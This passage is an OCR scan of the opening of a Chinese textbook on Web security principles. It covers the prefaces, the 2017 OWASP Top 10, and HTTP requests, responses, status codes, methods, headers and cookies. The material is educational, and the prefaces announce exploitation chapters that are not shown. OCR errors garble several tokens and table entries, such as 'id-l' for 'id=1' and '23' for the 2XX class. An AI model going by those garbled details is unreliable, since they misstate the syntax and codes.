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本 书 全 面 介绍 与 Web 安全 相关 的 常见 漏洞 的 原理 分 析 和 代码 分 析 方 法 。 全 书 共 13 章 , 第 1 章 为 
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供 了 思考 题 。 

本 书 适合 作为 信息 安全 、 网 络 空间 安全 、 网 络 工程 等 相关 专业 的 教材 ,也 可 供 网 络 安全 运 维和 人 员 、 网 
络 管理 人 员 和 对 网 络 空间 安全 感 兴趣 的 读者 参考 。 
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出 版 说 明 一 


21 世纪 是 信息 时 代 , 信 息 已 成 为 社会 发 展 的 重要 战略 资源 ,社会 的 信息 
化 已 成 为 当今 世界 发 展 的 潮流 和 核心 ,而 信息 安全 在 信息 社会 中 将 扮演 极为 
重要 的 角色 , 它 会 直接 关系 到 国家 安全 ,企业 经 营 和 人 们 的 日 常生 活 。 随 着 
信息 安全 产业 的 快速 发 展 ,全 球 对 信息 安全 人 才 的 需求 量 不 断 增加 ,但 我 国 
目前 信息 安全 人 才 极 度 匮 乏 , 远 远 不 能 满足 金融 .商业 .公安 、. 军 事 和 政府 等 
部 门 的 需求 。 要 解决 供需 矛盾 ,必须 加 快 信息 安全 人 才 的 培养 ,以 满足 社会 
对 信息 安全 人 才 的 需求 。 为 此 ,教育 部 继 2001 年 批准 在 武汉 大 学 开设 信息 
安全 本 科 专 业 之 后 ,又 批准 了 多 所 高 等 院 校 设 立信 息 安全 本 科 专 业 , 而 且 许 
多 高 校 和 科研 院 所 已 设立 了 信息 安全 方向 的 具有 硕士 和 博士 学 位 授予 权 的 
学 科 点 。 

信息 安全 是 计算 机 、 通 信 、 物 理 、 数 学 等 领域 的 交叉 学 科 , 对 于 这 一 新 兴 
学 科 的 培养 模式 和 课程 设置 ,各 高 校 普遍 缺乏 经 验 ,因此 中 国 计 算 机 学 会 教 
育 专 业 委 员 会 和 清华 大 学 出 版 社 联合 主办 了 “信息 安全 专业 教育 教学 研讨 
会 ”等 一 系列 研讨 活动 ,并 成 立 了 “高 等 院 校 信息 安全 专业 系列 教材 ”编审 委员 
会 ,由 我 国信 息 安全 领域 著名 专家 肖 国 镇 教授 担任 编 委 会 主任 ,指导 “高 等 院 校 
信息 安全 专业 系列 教材 ”的 编写 工作 。 编 委 会 本 着 研究 先行 的 指导 原则 ,认真 
研讨 国内 外 高 等 院 校 信息 安全 专业 的 教学 体系 和 课程 设置 ,进行 了 大 量具 有 前 
脆性 的 研究 工作 ,而 且 这 种 研究 工作 将 随 着 我 国信 息 安全 专业 的 发 展 不 断 深 
入 。 系 列 教材 的 作者 都 是 既 在 本 专业 领域 有 深厚 的 学 术 造 放 ,又 在 教学 第 一 线 
有 丰富 的 教学 经 验 的 学 者 专家 。 

该 系列 教材 是 我 国 第 一 套 专门 针对 信息 安全 专业 的 教材 ,其 特点 是 : 

体系 完整 结构 合理 .内 容 先进 。 

Q 适应 面 广 : 能 够 满足 信息 安全 计算机、 通信 工程 等 相关 专业 对 信息 
安全 领域 课程 的 教材 要 求 。 

O 立体 配套 : 除 主教 材 外 ,还 配 有 多 媒体 电子 教案 .习题 与 实验 指导 等 。 

CD. 版 本 更 新 及 时 , 紧 跟 科学 技术 的 新 发 展 。 

在 全 力 做 好 本 版 教材 ,满足 学 生 用 书 的 基础 上 ,还 经 由 专家 的 推荐 和 审 
XE , 遵 选 了 一 批 国外 信息 安全 领域 优秀 的 教材 加 入 系列 教材 中 ,以 进一步 满 
足 大 家 对 外 版 书 的 需求 。“ 高 等 院 校 信 息 安 全 专业 系列 教材 "已 于 2006 年 年 
初 正式 列 和 普通 高 等 教育 “十 一 五 ”国家 级 教材 规划 。 

2007 年 6 月 ,教育 部 高 等 学 校 信息 安全 类 专业 教学 指导 委员 会 成 立 大 会 
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暨 第 一 次 会 议 在 北京 胜利 召开 。 本 次 会 议 由 教育 部 高 等 学 校 信息 安全 类 专业 教学 指导 委 
员 会 主任 单位 北京 工业 大 学 和 北京 电子 科技 学 院 主办 ,清华 大 学 出 版 社 协办 。 教 育 部 高 
等 学 校 信息 安全 类 专业 教学 指导 委员 会 的 成 立 对 我 国信 息 安 全 专业 的 发 展 起 到 重要 的 指 
导 和 推动 作用 。2006 年 教育 部 给 武汉 大 学 下 达 了 “信息 安全 专业 指导 性 专业 规范 研制 ” 
的 教学 科研 项 目 。2007 年 起 该 项 目 由 教育 部 高 等 学 校 信息 安全 类 专业 教学 指导 委员 会 
组 织 实施 。 在 高 教 司 和 教 指 委 的 指导 下 ,项 目 组 团结 一 致 ,努力 工作 ,克服 困难 ,历时 5 
年 ,制定 出 我 国 第 一 个 信息 安全 专业 指导 性 专业 规范 ,于 2012 年 年 底 通 过 经 教育 部 高 等 
教育 司 理工 科教 育 处 授权 组 织 的 专家 组 评审 ,并 且 已 经 得 到 武汉 大 学 等 许多 高 校 的 实际 
使 用 。2013 年 ,新 一 届 教 育 部 高 等 学 校 信息 安全 专业 教学 指导 委员 会 成 立 。 经 组 织 审查 
和 研究 决定 ,2014 年 以 教育 部 高 等 学 校 信 息 安全 专业 教学 指导 委员 会 的 名 义 正 式 发 布 
《高 等 学 校 信息 安全 专业 指导 性 专业 规范 》( 由 清华 大 学 出 版 社 正式 出 版 )。 

2015 年 6 月 ,国务 院 学 位 委员 会 .教育 部 出 台 增 设 “ 网 络 空 间 安 全 "为 一 级 学 科 的 决 
定 , 将 高 校 培养 网 络 空间 安全 人 才 提 到 新 的 高 度 。2016 年 6 月 ,中 央 网 络 安 全 和 信息 化 
领导 小 组 办 公 室 (下 文 简称 中 央 网 信和 办) 、 国 家 发 展 和 改革 委员 会 教育 部 、 科 学 技术 部 、 工 
业 和 信息 化 部 及 人 力 资源 和 社会 保障 部 六 大 部 门 联合 发 布 (关于 加 强 网 络 安全 学 科 建 设 
和 人 才 培 养 的 意见 》 中 网 办 发 文 [2016]4 号 )。2019 年 6 月 ,教育 部 高 等 学 校 网 络 空间 安 
全 专业 教学 指导 委员 会 召开 成 立 大 会 。 为 贯彻 落实 4 关于 加 强 网 络 安全 学 科 建 设 和 人 才 
培养 的 意见 》, 进 一 步 深 化 高 等 教育 教学 改革 ,促进 网 络 安全 学 科 专 业 建 设 和 人 才 培 养 , 促 
进 网 络 空间 安全 相关 核心 课程 和 教材 建设 ,在 教育 部 高 等 学 校 网 络 空间 安全 专业 教学 指 
导 委 员 会 和 中 央 网 信 办 资助 的 网 络 空间 安全 教材 建设 课题 组 的 指导 下 ,启动 了 “网 络 空间 
安全 重点 规划 丛书 ”的 工作 ,由 教育 部 高 等 学 校 网 络 空间 安全 专业 教学 指导 委员 会 秘书 长 
封 化 民 教授 担任 编 委 会 主任 。 本 规划 丛书 基于 “高 等 院 校 信 息 安全 专业 系列 教材 "坚实 的 
工作 基础 和 成 果 、 阵 容 强 大 的 编审 委员 会 和 优秀 的 作者 队伍 ,目前 已 经 有 多 本 图 书 获得 教 
育 部 和 中 央 网 信 办 等 机 构 评 选 的 “普通 高 等 教育 本 科 国 家 级 规划 教材 “普通 高 等 教育 精 
品 教 材 “ 中 国 大 学 出 版 社 图 书 奖 ”" 和 “国家 网 络 安全 优秀 教材 奖 ” 等 多 个 奖项 。 

“网 络 空间 安全 重点 规划 丛书 ?将 根据 (高 等 学 校 信息 安全 专业 指导 性 专业 规范 )( 及 
后 续 版 本 ) 和 相关 教材 建设 课题 组 的 研究 成 果 不 断 更 新 和 扩展 ,进一步 体现 科学 性 、 系 统 
性 和 新 颖 性 ,及 时 反映 教学 改革 和 课程 建设 的 新 成 果 .并 随 着 我 国 网 络 空间 安全 学 科 的 发 
展 不 断 完 善 ,力争 为 我 国 网 络 空间 安全 相关 学 科 专 业 的 本 科 和 研究 生 教 材 建设 ,学术 出 版 
与 人 才 培 养 做 出 更 大 的 贡献 。 

我 们 的 E-mail 地 址 是 : zhangm@tup. tsinghua. edu. cn ,联系 人 : 张 民 。 


“网 络 空间 安全 重点 规划 丛书 编审 委员 会 


没有 网 络 安全 ,就 没有 国家 安全 ;没有 网 络 安全 人 才 ,就 没有 网 络 安全 。 

为 了 更 多 更 快 . 更 好 地 培养 网 络 安全 人 才 ,许多 高 校 都 在 加 大 投入 , 聘 
请 优秀 教师 ,招收 优秀 学 生 , 以 建设 一 流 的 网 络 空间 安全 专业 。 

网 络 空间 安全 专业 建设 需要 体系 化 的 培养 方案 .系统 化 的 专业 教材 和 专 
业 化 的 师资 队伍 。 优 秀 教材 是 网 络 空 间 安 全 专业 人 才 培 养 的 关键 ,然而 ,这 
是 一 项 十 分 艰巨 的 任务 。 原 因 有 二 : 其 一 ,网 络 空间 安全 的 涉及 面 非常 广 ， 
至 少 包括 密码 学 、 数 学 、 计 算 机 、 通 信和 工程 等 多 门 学 科 , 因 此 ,其 知识 体系 庞 
杂 , 难 以 梳理 ;其 二 ,网 络 空间 安全 的 实践 性 很 强 , 技 术 发 展 更 新 非常 快 ,对 教 
学 环境 和 师资 要 求 也 很 高 。 

作者 一 直 从 事 网 络 安全 方面 的 教学 .服务 和 研究 工作 ,积累 了 大 量 的 实 
践 经 验 。 通 过 本 书 ,作者 将 自己 积累 的 学 习 经 验 和 实际 工作 中 的 实践 经 验 与 
读者 分 享 ,使 读者 可 以 在 Web 安全 领域 快速 入门 ,通过 典型 漏洞 代码 分 析 对 
Web 安全 的 漏洞 原理 有 深入 的 理解 ,并 且 通 过 案例 实践 提高 实际 操作 能 力 。 

本 书 对 各 种 漏洞 的 形成 原理 进行 了 深入 .详细 的 分 析 , 既 包括 常见 的 经 
典 漏洞 ,也 包括 近来 出 现 的 新 型 漏洞 ,对 各 种 漏洞 都 结合 案例 进行 了 详细 的 
代码 分 析 ,并 对 漏洞 的 利用 方式 进行 了 全 面 讲 解 。 读 者 可 以 通过 本 书 了 解 各 
种 漏洞 的 形成 原理 、 利 用 方式 及 修复 方法 。 不 论 是 初学 者 还 是 有 一 定 工作 经 
验 的 从 业者 ,都 能 通过 本 书 全 面 、 系 统 地 掌握 漏洞 原理 和 相关 知识 。 本 书 既 
可 以 作为 Web 安全 初学 者 的 入 门 书籍 ,又 可 以 作为 Web 安全 工作 者 的 工 
具 书 。 

"Web 安全 原理 分 析 与 实践 "是 网 络 空间 安全 和 信息 安全 专业 的 专业 课 
程 。 本 书 由 浅 入 深 , 由 理论 到 实践 ,讲解 了 与 Web 攻防 相关 的 整个 体系 , 涉 
及 的 知识 面 很 宽 。 本 书 共 13 章 。 第 1 章 介 绍 Web 安全 基础 ,第 2 章 介绍 
SQL 注入 漏洞 ,第 3 章 介绍 文件 上 传 漏洞 ,第 4 章 介 绍 文件 包含 漏洞 ,第 5 章 
介绍 命令 执行 漏洞 ,第 6 章 介绍 代码 执行 漏洞 ,第 7 章 介绍 XSS 漏洞 ,第 8 章 
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Web 安全 基础 
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1.1 网 络 安全 现状 


随 着 科学 技术 的 迅猛 发 展 , 越 来 越 多 的 应 用 从 C/S 架构 转变 为 B/S 架构 ,Web 已 经 
逐渐 成 为 网 络 应 用 的 主要 载体 ,用 户 可 以 通过 Web 网 站 浏览 网 页 .购物 ,办公 等 。 科 技 的 
发 展 给 人 们 的 生活 带 来 了 极 大 的 便利 ,但 是 网 络 安全 相关 的 攻击 也 愈演愈烈 ,攻击 者 利用 
Web 应 用 本 身 存在 的 漏洞 进行 数据 获取 信息 系统 破坏 的 安全 事件 层出不穷 ,给 国家 安 
全 ,企业 安全 和 个 人 隐私 安全 等 带 来 了 极 大 的 危害 。 

未 知 攻 , 看 知 防 ? 本 书 对 与 Web 应 用 相关 的 各 种 类 型 的 典型 漏洞 进行 深入 、 详 细 的 
分 析 , 既 对 常见 的 经 典 漏洞 及 其 利用 方式 进行 分 析 , 又 与 时 俱 进 对 近年 来 出 现 的 新 漏洞 及 
其 利用 方式 进行 分 析 ,希望 读者 能 够 通过 本 书 快速 掌握 Web 安全 相关 漏洞 的 形成 原理 及 
漏洞 利用 方式 。 


12 常见 的 Web 安全 漏洞 


OWASP(Open Web Application Security Project, 开 放 式 Web 应 用 程序 安全 项 目 ) 
是 一 个 组 织 , 它 提供 有 关 计 算 机 和 互联 网 应 用 程序 的 公正 、 实 际 、 有 成 本 效益 的 信息 ,其 目 
的 是 协助 个 人 ,企业 和 机 构 发 现 和 使 用 可 信赖 软件 。 

Web 安全 攻击 的 方式 多 种 多 样 , 表 1-1 中 的 漏洞 是 OWASP 公开 发 布 的 2017 年 版 的 
OWASP Top 10, 即 十 大 Web 安全 漏洞 ,主要 基于 40 多 家 专门 从 事 应 用 程序 安全 业务 的 
公司 提交 的 数据 以 及 500 位 以 上 个 人 完成 的 行业 调查 。 这 些 数据 包含 了 从 数 以 百 计 的 组 
织 和 超过 10 万 个 实际 应 用 程序 和 API 中 收集 的 漏洞 。 这 十 大 Web 安全 漏洞 是 根据 这 
些 调查 数据 综合 分 析 ,排序 而 来 的 ,并 结合 了 对 可 利用 性 .可 检测 性 和 影响 程度 的 一 致 性 
评估 而 得 出 的 。 


表 1-1 2017 年 版 OWASP Top 10 


漏洞 类 型 # Ë 
将 不 受信 任 的 数据 作为 命令 或 查询 的 一 部 分 发 送 到 解析 器 时 ,会 产生 SQL 注 
注入 入 、NoSQL 注入 、OS 注入 和 LDAP 注入 等 注入 缺陷 。 攻 击 者 的 恶意 数据 可 以 
诱 使 解析 器 在 没有 适当 授权 的 情况 下 执行 非 预 期 命令 或 访问 数据 
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续 表 
漏 洞 类 型 d 3x 


通常 ,通过 错误 使 用 应 用 程序 的 身份 认证 和 会 话 管理 功能 ,攻击 者 能 够 破译 密 
失效 的 身份 认证 | 码 、 密 钥 或 会 话 令 牌 ,或 者 利用 其 他 开发 缺陷 来 暂时 性 或 永久 性 冒充 其 他 用 户 
的 身份 


许多 Web 应 用 程序 和 API 都 无 法 正确 保护 敏感 数据 ,例如 财务 数据 、 医 疗 数据 
和 PH 数据。 攻击 者 可 以 通过 窃取 或 修改 未 加 密 的 数据 来 实施 信用 卡 诈骗 、 身 
份 盗窃 或 其 他 犯罪 行为 。 未 加 密 的 敏感 数据 容易 受到 破坏 ,因此 ,需要 对 敏感 
数据 加 密 , 这 些 数据 包括 传输 过 程 中 的 数据 ,存储 的 数据 以 及 浏览 器 的 交互 数据 


许多 较 早 的 或 配置 错误 的 XML 处 理 器 使 用 了 XML 文件 中 的 外 部 实体 引用 。 
攻击 者 可 以 利用 外 部 实体 窃取 使 用 URI 文 件 处 理 器 的 内 部 文件 和 共享 文件 , 监 
听 内 部 扫描 端口 ,执行 远程 代码 ,实施 拒绝 服务 攻击 


未 对 通过 身份 验证 的 用 户 实施 恰当 的 访问 控制 。 攻 击 者 可 以 利用 这 些 缺 陷 访 
失效 的 访问 控制 问 未 经 授权 的 功能 或 数据 ,例如 访问 其 他 用 户 的 账户 、 查 看 敏感 文件 ,修改 其 他 
用 户 的 数据 、 更 改 访问 权限 等 


安全 配置 错误 是 最 常见 的 安全 问题 ,这 通常 是 由 于 不 安全 的 默认 配置 .不 完整 
的 临时 配置 .开源 云 存 储 、 错 误 的 HTTP 标 头 配置 以 及 包含 敏感 信息 的 详细 错 


敏感 数据 泄露 


XML 外 部 实体 
(XXE) 


KEREMMA 误 信息 所 造成 的 。 因 此 ,不 仅 需要 对 所 有 的 操作 系统 ,框架 、 库 和 应 用 程序 进行 
安全 配置 ,而 且 必 须 及 时 修补 和 升级 它们 
当 应 用 程序 的 新 网 页 中 包含 不 受信 任 的 .未 经 恰当 验证 或 转 义 的 数据 时 ,或 者 
wp | 使 用 可 以 创建 HTML 或 JavaScript 脚本 的 浏览 名 AP1 更 新 现 有 的 网 页 时 ,就 会 


出 现 XSS 缺陷 。XSS 让 攻击 者 能 够 在 受害 者 的 浏览 器 中 执行 脚本 ,并 劫持 用 户 
会 话 \ 破 坏 网 站 或 将 用 户 重 定向 到 恶意 站 点 


不 安全 的 反 序列 化 会 导致 远程 代码 执行 。 即 使 反 序列 化 缺陷 不 会 导致 远程 代 
不 安全 的 反 序列 化 | 码 执行 ,攻击 者 也 可 以 利用 它们 实施 攻击 ,包括 重 放 攻击 、 注 入 攻击 和 特权 升级 
攻击 


组 件 ( 例 如 库 、 框 架 和 其 他 软件 模块 ) 拥 有 和 应 用 程序 相同 的 权限 。 如 果 应 用 程 
使 用 含有 已 知 漏洞 | 序 中 含有 已 知 漏 洞 的 组 件 被 攻击 者 利用 ,可 能 会 造成 严重 的 数据 丢失 或 服务 器 
的 组 件 接管 。 同 时 ,使 用 含有 已 知 漏洞 的 组 件 的 应 用 程序 和 API, 可 能 会 破坏 应 用 程序 
的 防御 功能 , 且 无 法 抵御 各 种 攻击 ,从 而 产生 严重 影响 


不 足 的 日 志 记录 和 监控 以 及 事件 响应 缺失 或 无 效 的 集成 使 攻击 者 能 够 进一步 
不 足 的 日 志 记录 和 | 攻击 系统 、 保 持 持续 性 或 转向 更 多 系统 ,以 及 自 改 .提取 或 销毁 数据 。 大 多 数 缺 
监控 陷 研究 显示 ,缺陷 被 检测 出 的 时 间 超 过 200 天 , 且 通 常 是 通过 外 部 检测 方 检测 出 
来 的 ,而 不 是 通过 内 部 流程 或 监控 检测 出 来 的 


从 2017 年 版 的 OWASP Top 10 可 以 看 出 ,注入 仍然 是 十 大 Web 安全 漏洞 之 首 。 后 
面 各 章 会 对 相关 漏洞 的 原理 和 利用 过 程 进行 详细 分 析 。 


_ RE HTTP 基础 


超 文本 传输 协议 (HyperText Transfer Protocol，HTTP) 详 细 规 定 了 浏览 器 和 万 维 
网 服务 器 之 间 相互 通信 的 规则 , 它 是 万 维 网 交换 信息 的 基础 , 它 允 许 将 超 文本 标记 语言 
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(HyperText Markup Language, HTML) X f£4JÁ Web 服务 器 传送 到 Web 浏览 器 。 
HTTP 遵循 请 求 / 响 应 (request/response) 模 型 , Web 浏览 器 向 Web 服务 器 发 送 请 
求 , Web 服务 器 处 理 请 求 并 返回 适当 的 响应 。HTTP 请 求 /响应 模型 如 图 1-1 所 示 。 


图 1-1 HTTP 请 求 /响应 模型 


4.34 HTTP Z URL 


统一 资源 定位 符 (Uniform Resource Locator, URL) 是 一 种 特殊 类 型 的 统一 资源 标 
识 符 (Uniform Resource Identifier, URD ,用 来 标识 互联 网 某 一 处 资源 的 地 址 。 
URL 的 标准 格式 如 下 : 


协议 :// 服 务 器 域名 [: 端 口 ] /路 径 /[? 查 询 ] 


例如 ,http://www. ctfs-wiki. com/SQLi/sqli. php? id=1,J URL 涉及 以 下 5 个 部 分 。 

(1) 协议 。 该 URL 的 协议 为 http, 这 代表 使 用 的 是 HTTP。 在 Internet 中 可 以 使 用 
多 种 协议 ,如 HTTP. HTTPS 等 ,本 例 中 使 用 的 是 HTTP. http 后 面 的 :// 为 分 隔 符 。 

(2) 服务 器 域名 。 该 URL 的 服务 器 域名 为 www. ctís-wiki. com, 也 可 以 使 用 IP 地 
址 来 表示 。 

(3) 端口 。 在 服务 器 域名 后 面 的 是 端口 ,服务 器 域名 和 端口 之 间 使 用 英文 冒号 (:) 作 
为 分 隔 符 。 端 口 不 是 一 个 URL 必需 的 部 分 ,如 果 省 略 端口 ,将 采用 默认 端口 。 本 例 就 采 
用 了 HTTP 的 默认 80 端口 ,此 URL 的 端口 是 80. 

(4) 路 径 。 路 径 是 在 端口 后 面 由 零 个 或 多 个 斜 线 (/) 隔 开 的 字符 串 ,一 般 用 来 表示 主 
机 上 的 一 个 目录 或 文件 地 址 。 本 例 的 路 径 为 SQLi/sqli. php. 

(5) 查询 。 从 “?? 开 始 的 部 分 为 查询 。 本 例 中 的 查询 为 id 一 1。 其 中 ,id 为 参数 名 ,1 
为 参数 值 。 


1.3.2 HTTP 请 求 
HTTP 请 求 包括 3 部 分 ,分 别 是 请 求 行 .请 求 头 (消息 报头 ) 和 请 求 正文 。 
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例如 : 
POST /SQLi/sqli.php HTTP/1.1 // 请 求 行 
HOST:www.ctfs-wiki.com // 请 求 头 


User- Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv: 55. 0) Gecko/20100101 
Firefox/55.0 


// 空 白 行 ,代表 请 求 头 结束 
id-l // 请 求 正文 


HTTP 请 求 的 第 一 行 是 请 求 行 ,由 请 求 方法 .请 求 路 径 和 协议 版 本 3 部 分 组 成 。 本 
例 中 请 求 行 的 请 求 方法 是 POST ,请 求 路 径 是 /SQLiVsqli. php ,协议 版 本 是 HTTP 1. 1。 

HTTP 请 求 的 第 二 行 至 空白 行为 HTTP 请 求 中 的 请 求 头 。 请 求 头 包含 许多 有 关 客 
户 端 环境 和 请 求 正 文 的 有 用 信息 。 本 例 中 HOST 代表 请 求 的 主机 地 址 , User-Agent 代 
表 浏 览 器 的 标识 。 

请 求 头 和 请 求 正 文 之 间 是 一 个 空 行 ,这 个 空 行 非常 重要 , 它 表 示 请 求 头 已 经 结束 , 接 
下 来 的 是 请 求 正文 ,请求 正文 中 可 以 包含 客户 端 请 求 提交 的 查询 字符 串 信 息 。 本 例 中 的 
请 求 正 文 是 id=1。 


1.3.3 HTTP 响应 


HTTP 响应 也 由 3 部 分 内 容 组 成 ,分 别 是 响应 行 . 响 应 头 (消息 报头 ) 和 响应 正 
以 下 是 HTTP 响应 的 示例 : 


HTTP/1.1 200 OK // 响 应 行 
Server: Apache/2.4.23 OpenSSL/1.0.2j PHP/5.2.17 // 响 应 头 
X-Powered-By: PHP/5.2.17 

Content-Length: 211 

Keep-Alive: timeout-5, max-100 

Connection: Keep-Alive 


Content-Type: text/html 
hello // 响 应 正文 


HTTP 响应 的 第 一 行 是 响应 行 ,由 协议 版 本 .状态 码 和 状态 消息 3 部 分 组 成 。 本 例 
的 协议 版 本 是 HTTP 1. 1, 状 态 码 是 200 ,消息 状态 是 OK. 

HTTP 响应 的 第 二 行 至 末尾 的 空白 行为 响应 头 , 用 来 传递 不 能 放 在 响应 行 中 的 附加 

应 信息 ,关于 服务 器 的 信息 和 对 Request-URI 所 标识 的 资源 进行 下 一 步 访问 的 信息 。 
本 例 中 ,Server 指定 了 服务 器 返回 的 banner 信息 ,Content-Type 指定 了 MIME 类 型 的 
HTML(text/html) ,编码 类 型 是 UTF-8。 

响应 头 之 后 是 响应 正文 ,是 服务 器 返回 给 客户 端的 文本 信息 。 本 例 中 的 响应 正文 是 hello。 


1.3.4 HTTP 状态 码 


客户 端 发 出 HTTP 请 求 , 服 务 器 接收 到 请 求 , 会 返回 一 个 包含 HTTP 状态 码 的 信息 
头 , 以 响应 浏览 器 的 请 求 。 
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HTTP 状态 码 由 一 个 3 位 的 十 进 制 数字 组 成 ,第 一 位 数字 定义 了 状态 码 的 类 型 ,后 
两 位 数字 没有 分 类 的 作用 。HTTP 状态 码 共 分 为 5 种 ,如 表 1-2 所 示 。 


表 1-2 5 种 HTTP 状态 码 


分 类 分 类 描述 

1Xx 信息 ,服务 器 收 到 请 求 ,需要 请 求 者 继续 执行 操作 
23 成 功 ,操作 被 成 功 接收 并 处 理 

3XX 重 定向 ,需要 进一步 操作 以 完成 请 求 

4X Xx 客户 端 错误 ,请求 包含 语法 错误 或 无 法 完成 请 求 

5X X 服务 器 错误 ,服务 器 在 处 理 请 求 的 过 程 中 发 生 了 错误 

常见 的 HTTP 状态 码 如 表 1-3 所 示 o 
表 1-3 常见 的 HTTP 状态 码 

状态 码 状态 描述 说 明 

200 | OK 客户 端 请 求 成 功 


301 


永久 移动 。 请 求 的 资源 已 被 永久 移动 到 新 的 URI, 返 回信 息 会 包括 
Moved Permanently | 新 的 URI, 浏 览 器 会 自动 定向 到 新 的 URI。 今后 任何 新 的 请 求 都 应 


使 用 新 的 URI 代替 

aoa pawaq 临时 移动 。 与 301 类 似 。 但 资源 只 是 临时 被 移动 。 客 户 端 应 继续 使 
HEA URI 

400 | Bad Request 客户 端 错误 ,请 求 包含 语法 错误 或 无 法 完成 请 求 

401 Unauthorized 请 求 要 求 用 户 的 身份 认证 

403 | Forbidden 服务 器 理解 客户 端的 请 求 ,但 是 拒绝 执行 此 请 求 

404 | Not Found 服务 器 无 法 根据 客户 端的 请 求 找 到 资源 (网 页 ) 


500 


Internal Server Error | 服务 器 内 部 错误 ,无 法 完成 请 求 


503 


Service Unavailable | 由 于 超载 或 系统 维护 ,服务 器 暂时 无 法 处 理 客户 端的 请 求 


1.35 HTTP 请 求 方法 


HTTP 1. 0 定义 了 3 个 请 求 方法 : GET, HEAD 和 POST 方 法 。 

HTTP 1. 1 新 增 了 5 个 请 求 方法 : PUT, DELETE, CONNECT, OPTIONS 和 
TRACE 方法 。 

这 8 个 请 求 方法 如 表 1-4 所 示 。 


表 1-4 HTTP 请 求 方法 


请 求 方法 描 xk 


GET 


请 求 指定 的 页 面 信息 ,并 返回 实体 主体 


HEAD 


与 GET 请 求 相似 ,但 是 只 返回 响应 行 和 响应 头 , 不 返回 响应 正文 
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续 表 
请 求 方法 描 述 
nost 向 指定 资源 提交 数据 以 处 理 请 求 ( 例 如 ,提交 表单 或 者 上 传 文件 ) ,数据 被 包含 在 请 求 
体 中 。POST 请 求 可 能 会 导致 新 的 资源 的 建立 和 /或 已 有 资源 的 修改 
PUT 从 客户 端 向 服务 器 传送 数据 并 进行 存储 或 替换 
DELETE | 请 求 删除 服务 器 指定 的 页 面 
CONNECT | HTTP 1.1 协议 中 预 留 给 能 够 将 连接 改 为 管道 方式 的 代理 服务 器 
OPTIONS | 允许 客户 端 查看 服务 器 的 性 能 
TRACE 回 显 服务 器 收 到 的 请 求 , 主 要 用 于 测试 或 诊断 


在 实际 使 用 中 最 常用 的 是 GET 方法 和 POST 方 法。 


1. GET 方法 示例 
下 面 是 用 GET 方法 实现 的 HTTP 请 求 : 


GET /SQLi/login.php?username-ctfs&password-wiki HTTP/1.1 
HOST:www.ctfs-wiki.com 

User- Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv: 55. 0) Gecko/20100101 
Firefox/55.0 


2. POST 方法 示例 
下 面 是 用 POST 方法 实现 的 相同 的 HTTP 请 求 : 


POST /SQLi/login.php HTTP/1.1 

HOST:www.ctfs-wiki.com 

User- Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv: 55. 0) Gecko/20100101 
Firefox/55.0 


username-ctfs&password-wiki 


从 上 面 的 两 个 请 求 可 以 看 出 ,GET 方法 和 POST 方法 都 可 以 获取 指定 网 页 的 内 容 ， 
但 是 两 者 又 有 较 大 区 别 。 

区 别 一 : GET 方法 没有 请 求 正 文 , 而 POST 方法 有 请 求 正文 。 

区 别 二 : GET 方法 请 求 数据 有 长 度 限 制 ,而 POST 方法 请 求 数据 没有 长 度 限 制 。 

区 别 三 : GET 方法 会 在 浏览 器 中 显示 请 求 的 数据 ;而 POST 方法 不 会 在 浏览 器 中 显 
示 请 求 的 数据 ,因此 更 为 安全 。 


1.3.6 


HTTP 请 求 头 


HTTP 请 求 头 包含 许多 有 关 的 客户 端 环境 和 请 求 正 文 的 有 用 信息 。 下面 是 比较 常 
见 的 HTTP 请 求 头 : 
Host: 请 求 的 Web 服务 器 域名 或 者 IP 地 址 。 


Po 第 1 章 Web 安全 基础 。 gz 


User-Agent: HTTP 客户 端 运行 的 浏览 器 类 型 的 详细 信息 。 通 过 该 信息 , Web 服务 
器 可 以 判断 出 当前 HTTP 请 求 的 客户 端 浏览 器 类 别 。 

Accept: 指定 客户 端 能 够 接收 的 内 容 类 型 ,内 容 类 型 的 先后 次 序 表示 客户 端 接收 的 
先后 次 序 。 

Accept-Language: 指定 HTTP 客户 端 浏览 器 用 来 展示 返回 信息 所 优先 选择 的 语言 。 

Cookie; HTTP 请 求 发 送 时 ,会 把 保存 在 该 请 求 域名 下 的 所 有 Cookie 值 一 起 发 送 给 
Web 服务 器 。 

Referer: 包含 一 个 URL, 用 户 从 该 URL 代表 的 页 面 出 发 访问 当前 请 求 的 页 面 。 


1.3.7 HTTP 响应 头 


HTTP 响应 头 中 包含 服务 器 在 传递 过 程 中 不 能 放 在 响应 行 中 的 附加 响应 信息 、 相 关 
服务 器 的 信息 和 对 Request-URI 所 标识 的 资源 进行 下 一 步 访问 的 信息 。 下 面 是 比较 常 
见 的 HTTP 响应 头 : 

Location: 控制 浏览 器 重 定 向 到 哪个 页 面 。 

Server: 服务 器 的 banner 信息 。 

Set-Cookie: 服务 器 发 送 给 客户 端的 Cookie 设置 信息 。 

Cache-Control: 服务 器 控制 浏览 器 是 否 要 缓存 网 页 。 


1.4 Cookie 和 Session 


HTTP 本 身 是 无 状态 的 ,不 能 保存 服务 器 和 客户 端的 状态 信息 。 客 户 端 访 问 一 次 
Web 应 用 和 连续 访问 10 次 Web 应 用 ,服务 器 返回 的 页 面 都 是 一 样 的。 但 是 在 有 些 情况 
下 ,需要 服务 器 能 够 记 住 或 者 识别 用 户 ,为 此 引入 了 Cookie 和 Session 的 概念 。 

Cookie 和 Session 的 原理 很 简单 。 例 如 ,去 某 个 公司 参观 。 第 一 次 去 没有 出 入 证 , 当 
找到 相关 人 员 办 理 了 出 入 证 之 后 ,以 后 在 哪里 都 需要 带 着 此 出 入 证 来 代表 自己 的 身份 ; 当 
参观 结束 时 ,就 归还 出 入 证 ,这 个 过 程 等 同 于 HTTP 请 求 中 的 一 次 会 话 ,出 入 证 就 是 
HTTP 中 的 Cookie 或 者 Session。 


1.4.1 Cookie 简介 


Cookie 是 客户 端 保存 用 户 信息 的 一 种 机 制 , 存 储 在 客户 端的 文件 中 。 

例如 ,在 登录 一 个 购物 网 站 后 ,可 以 看 到 自己 的 订单 信息 。 如 果 网 页 关闭 后 , 想 再 次 
查看 自己 的 订单 信息 ,并 不 用 再 次 输入 自己 的 用 户 名 和 密码 ,而 是 仍然 为 登录 状态 ,可 以 
直接 查看 。 这 是 因为 客户 端 已 经 将 用 户 登录 后 的 Cookie 存 人 客户 端的 Cookie 文件 中 ， 
此 文件 并 不 会 因为 浏览 器 关闭 而 消失 。 用 户 再 次 访问 同一 网 站 时 ,浏览 器 会 自动 查找 存 
